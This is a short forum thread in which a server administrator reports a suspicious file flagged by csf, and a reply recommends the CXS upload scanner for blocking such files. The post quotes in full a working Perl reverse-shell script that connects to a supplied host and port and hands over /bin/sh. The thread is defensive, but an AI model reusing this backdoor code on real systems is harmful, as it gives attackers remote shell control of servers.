Block certain suspicious files

Post Reply
saurabhnsonar
Junior Member
Posts: 2
Joined: 11 Sep 2011, 13:54

Block certain suspicious files

Post by saurabhnsonar »

I have got alert form csf regarding suspicious file bc. pl on the server with the following content.

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

This gives direct access to shell of the server. Can someone suggest me how can I stop such kind of backdoor connect script to work rather that checking a alert and manually deleting every time after I get just alert?
Please help with some suggestions to block such kind of hacking attacks.

Thank you!
Top
Sergio
Junior Member
Posts: 1693
Joined: 12 Dec 2006, 14:56

Re: Block certain suspicious files

Post by Sergio »

Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.

Sergio
Top
Post Reply

Return to “General Discussion (csf)”